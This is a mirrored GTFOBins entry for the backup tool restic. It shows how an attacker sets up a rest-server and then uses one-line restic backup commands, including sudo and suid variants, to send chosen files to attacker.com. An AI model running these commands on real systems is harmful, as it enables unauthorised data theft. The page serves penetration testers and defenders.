GTFOBins.github.io/restic.md at d02dea79bc61b87bba51cec4ef58b4d4d8e2fbc9

mirror/GTFOBins.github.io

Fork 0

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Andrea Cardaci 7f6221646b Fix and improve restic

2020-04-12 13:22:13 +02:00

1.2 KiB

Raw Blame History

description

functions

The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository: ```console RPORT=12345 NAME=backup_name ./rest-server --listen ":$RPORT" restic init -r "rest:http://localhost:$RPORT/$NAME" ``` To extract the data from the restic repository in the current directory on the attacker side: ```console restic restore -r "/tmp/restic/$NAME" latest --target . ``` Upload data to the attacker server with the following commands.

file-upload

sudo

suid

code
RHOST=attacker.com RPORT=12345 LFILE=file_or_dir_to_get NAME=backup_name restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"

code
RHOST=attacker.com RPORT=12345 LFILE=file_or_dir_to_get NAME=backup_name sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"

code
RHOST=attacker.com RPORT=12345 LFILE=file_or_dir_to_get NAME=backup_name ./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"

1.2 KiB Raw Blame History

1.2 KiB

Raw Blame History